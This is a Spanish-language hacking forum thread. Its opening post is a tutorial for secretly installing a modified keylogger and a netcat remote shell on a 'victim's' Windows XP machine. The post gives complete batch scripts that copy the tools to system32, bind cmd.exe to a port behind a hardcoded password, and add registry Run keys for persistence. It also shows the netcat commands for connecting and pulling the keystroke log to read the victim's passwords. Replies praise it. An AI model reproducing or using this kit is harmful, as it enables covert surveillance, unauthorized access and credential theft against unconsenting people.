Usando netcat seguro + keylogger en windows XP
broox:
keylogger + netcat seguro en Windows XP
Este post es para enseñar como se puede o se debe usar una de las mejores herramientas que mas me gustan ...
El netcat y mas aun cuando se convinan con algun keylogger en windows ...
El tema dice: netcat seguro, esto es porque he generado una manipulacion de un archivo BATCH protegido con nombre de usuario y contraseña, si los datos son correctos entonces se permite la shell remota sino se deniega el servicio ...
y hablando de keyloggers encontre uno en la red programado en Visual Basic 6 (VB6) llamado Guardian.exe por un tal Juan Manuel Crescente, ese keylogger fue el que mas me gustó, de hecho he modificado el codigo y lo he convertido en una peligrosa arma de hackeo ... yo lo llamo kl4.exe, no es mas que el codigo del compañero JuanMa con unas modificaciones que lo convierten en un keylogger sencillo, letal, sigiloso, y sobre todo eficaz...
Mi concepto de keylogger "perfecto" es aquel que: sea un solo archivo exe, para moverlo desde scripts BATCHS, y por otro lado lo que mas odio de un keylogger es que tenga un clasico proceso de instalacion de "siguiente" "siguiente", eso me molesta mucho, pues asi no seria posible instalar en keylogger remotamente y de manera silenciosa ... en fin, al grano.
En este tema se veran
-netcat en windows (de manera segura)
-keylogger kl4.exe basado en el source del Guardian de JuanMa
En fin. si no tienes el netcat (nc.exe) bajate mi version de aqui con todo y codigo fuente en C
http://rapidshare.com/files/289983134/Netcat_mas_source.zip
ademas aqui tienes el source original con su exe del Guardian (version JuanMa)
http://rapidshare.com/files/289987901/Guardian_keylogger_source_VB6__original_.rar
y aca tienes el source VB6 del kl4 con su exe tambien (mi version)
http://rapidshare.com/files/289988793/kl4.rar
te recomiendo que uses mi version porque es mas silenciosa, en cambio el Guardian.exe es exelente pero requiere manipulacion por el hacker ... ya sea para iniciar las capturas y detenerlas y eso ... y lo qeu necesitamos es un keylogger que haga todo eso automatico y qe se pueda cargar al regedit.exe para autoarrancar en cada reinicio del sistema.
Para continuar vamos a hacer lo siguiente: Es necesario hacer unos scripts para tener todo preparado
Comenzamos:
Ya que descargues el nc.exe y kl4.exe, procedemos a crear una carpeta donde quieras, para mi ejemplo la hare en C:\,
ahora bien ponle el nombre que quieras, para mi ejemplo la llamaré "sys" y debes poner dentro los dos archivos, el nc.exe y el kl4.exe y ahora abres el notepad.exe o mejor conocido como "bloc de notas" y escribes esto: ignora la linea punteada, solo esta para indicarte el inicio y fin del
archivo.
-----------------------------------------------------
@echo off
:: copea el netcat a system32
copy .\nc.exe C:\WINDOWS\system32\
:: copea el keylogger a system32
copy .\kl4.exe C:\WINDOWS\system32\
::copea el systempass a system32
copy .\systempass.bat C:\WINDOWS\system32\
:: corre a los binarios
start /b C:\windows\system32\nc -L -p 8002 -t -e systempass.bat -d
start /b C:\windows\system32\kl4.exe
:: Mete las claves de registro para autoarranque del sistema
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /v netcat /t REG_SZ /d "C:\WINDOWS\system32\nc -L -p 8002 -t -e systempass.bat -d"
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /v keylogger4 /t REG_SZ /d "C:\WINDOWS\system32\kl4.exe"
echo Listo, Listening on port 8002
----------------------------------------------------------
guardas el archivo con el nombre que quieras pero que tenga extension BAT, yo le he puesto el nombre de server.bat y lo guardas alli mismo dentro de la carpeta "sys" hasta ahora hay 3 archivos, vamos a crear un cuarto archivo, tambien es un BAT
abres el notepad.exe y le pones esto
-----------------------------------------------------------
@echo off
echo TERMINAL REMOTA USANDO NETCAT
echo Presiona ENTER para continuar ...
pause>nul
goto :restringido
:restringido
echo SYSTEMPASS BY juanito
echo CONTROL DE ACCESO POR NETCAT [DOS-NT]
goto :user0
:user0
set /p login=Usuario:
if %login%==cancel (
goto :eof
) else (
goto :user1
)
:pass0
set /p pass=Contrase?a:
if %pass%==cancel (
goto :eof
) else (
goto :pass1
)
:acceso
echo Bienvenido Juanito!
echo [ACCESS OK]
echo Presiona ENTER para continuar ...
pause>nul
@cmd.exe
goto :eof
:user1
if %login%==juanito (
goto :pass0
) else (
echo FATAL: Usuario NO registrado [!]
echo AYUDA: Para cancelar tipea cancel.
goto :user0
)
:pass1
if %pass%==123456 (
goto :acceso
) else (
echo ERROR: Contrase�a incorrecta [!]
echo AYUDA: Para cancelar tipea cancel.
goto :pass0
)
---------------------------------------------------------
a este archivo le debes poner el nombre de "systempass.bat" o bien ponle el que tu quieras pero tendras que modificar algunas cosas o parte de codigo donde se llame a systempass.bat, ahora adelante ...
Ya hay 4 archivos
-kl4.exe
-nc.exe
-systempass.bat
-server.bat
Yo recomendaria crear tambien el antidoto, es opcional, si lo quieres hacer crea otro archivo de texto con notepad y pegale este contenido
----------------------------------------------------------
@echo off
:: Mata los procesos activos correspondientes
taskkill /im nc.exe /f
taskkill /im kl4.exe /f
:: Elimina el netcat (no se recomienda)
:: del C:\WINDOWS\system32\nc.exe
:: Elimina el systempass de system32
del C:\WINDOWS\system32\systempass.bat
:: Respalda el log antes de elimanar todo
:: copy C:\WINDOWS\kl4.txt .\
:: Elimina el log
del C:\WINDOWS\kl4.txt
:: Elimina el keylogger
del C:\WINDOWS\system32\kl4.exe
:: Elimina las claves de autoarranque
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v netcat /f
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v keylogger4 /f
echo Server NK removido por completo!
-------------------------------------------------------------
al archivo ponle el nombre que quieras, yo le he puesto "antidoto.bat"
y listo, ya estamos listos ...
Lo que vamos a hacer a continuacion es, instalar de forma rapida y sencilla todo un kit de espionaje ya sea en nuestra propia maquina o en la maquina de tu victima ...
Debes cargar estos archivos en tu memoriaUSB y simplemente darle doble clic al archivo de nombre "server.bat" y listo, en segundos tendras todo instalado y sin el clasico "siguiente" "siguiente" lo cual te permite tener perfecto control sobre los archivos instalados ...
Ahora bien ... supongamos que ya le acabas de instalar el server a la maquina Windows XP de tu amigo, ahora vamos a entrar ilegalmente ... (lol)
NOTA: supongo que tu, como tu amigo estan en la misma LAN, si no no se va a poder, pero mas sin embargo si los dos estan en diferentes LANs unidos por una WAN entonces se puede lograr la conexion usando una herramienta de red VPN llamada "hamachi" pero eso es otro tema, interesante por cierto, luego lo posteo.
Ahora bien para meterte a la maquina de tu amigo haz:
Desde tu maquina: vamos a suponer que ya tienes el nc.exe en system32 de tu propia maquina y que ya conoces la IP de tu victima o bien su nombre netbios, suponemos que tu victima tiene un nombre netbios juanito y una IP 192.168.1.64 ahora hacemos
Abres una terminal DOS, mejor conocida como "Simbolo del sistema" o "MS-DOS" tambien se le conoce por "cmd.exe"
Para abrirla ve a INICIO y despues busca "ejecutar" y en ese cuadro pones "cmd" sin comillas y entonces aparecera la
pantalla negra de MS-DOS
NOTA: El simbolo ">" no lo escribas, se supone que es el prompt del sistema, ya esta alli, quiere decir que a partir de alli empieces a poner el demas codigo.
Establecemos conexion
>nc -vv 192.168.1.64 8002
si quieres hacer pruebas de conexion en tu propio equipo entonces instala el server y haces esto:
>nc -vv localhost 8002
ahora retomamos el tema...
y en cuestion de segundos te conectaras a la maquina de tu victima, pero no se te dara la peligrosa shell de inmediato, sino qeu tienes que autenticarte con usuario y contraseña, segun los que hayas definido en el archivo "systempass.bat" en este ejemplo yo ya he definido que el usuario es Juanito y la contraseña es 123456, pero obviamene tu los debes cambiar a tus necesidades, de esta manera garantizas que siempre seras tu, quien entre a esa maquina, en caso de que tengas mas amigos hackers que sepan usar el netcat...
ahora bien, si das los datos correctos el sistema te dara entonces si, la terminal remota ...
Una vez que ya estes dentro debes hacer lo siguiente
NOTA: hasta ahora en nuestra propia maquina tenemos una sola terminal DOS abierta, se van a necesitar 3 terminales
por lo tanto no pierdas de vista cual es la 1 y cual la 2 y cual la 3.
entonces ahora escribe en la misma primer terminal que tenemos, pues se supone qeu esta es la que tiene la shell remota,
nos cambiamos de carpeta
>cd \WINDWOS
listamos para encontrar el log
>dir kl4.txt
una vez que nos demos cuenta de que si existe, entonces nos vamos a transferir ese archivo desde la maquina de la victima
hasta la nuestra asi:
todavia estamos en la primer terminal y escribimos esto:
NOTA: para que el netcat te permita transferir un archivo debes estar en la misma carpeta que el archivo, o sea, en
C:\WINDOWS\
ahora bien hacemos esto:
>nc -vblp 8009 < kl4.txt
ahora bien debemos abrir otra terminal, esta seria la segunda, y debes poner esto:
>nc -vv 192.168.1.64 8009 > kl4.txt
al hacer esto en la segunda terminal el archivo se tranfiere muy rapido, pero para garantizar que ya se ha transferido todo el archivo entonces debes abrir una tercer terminal y poner
>dir
al hacer este listado fijate bien en la cantidad de bytes que tiene el archivo tranferido y luego mira la primer terminal para ver si tienen el mismo tamaño, si es asi, entonces ya puedes cerrar la tranferencia asi: debes ponerte en la segunda terminal y dar Cntrl+C esto cierra la tranferencia pero no te saca de la shell remota y ahora ponte en la primer terminal y ya puede seguir poniendo comandos .. aun estas dentro de la maquina de tu victima ...
si no quieres hacer nada mas, entonces pon "exit" en la primer terminal y la conexion se cierra y ahora ya puedes leer el log para ver las contraseñas y eso ...
suerte ...
NOTA: Usalo con responsabilidad (lol)
:P
NOTA: si usas linux aqui esta lo mismo pero en scripts bash
http://rapidshare.com/files/290032915/sys.tar.gz
gryphes:
Buen aporte, se agradece..., pero una sugerencia, usa las etiquetas de code, asi queda mejor a la vista...
Saludos.
SYN:
Si. exelente manual. me gusta tu estilo y otra utilidad más que se da al nc . valoro tu tiempo +1.
salud0's
nestusk8:
Muy buen tuto, n:
aún que el archivo nc.exe esta infetado por spyware xD :koolCPH:
salu2 :) ;D
messerschmitt:
Cita de: nestusk8 en 09 de Octubre de 2009, 05:04:40
aún que el archivo nc.exe esta infetado por spyware xD :koolCPH:
Hacktool ;)
Navegación
[#] Página Siguiente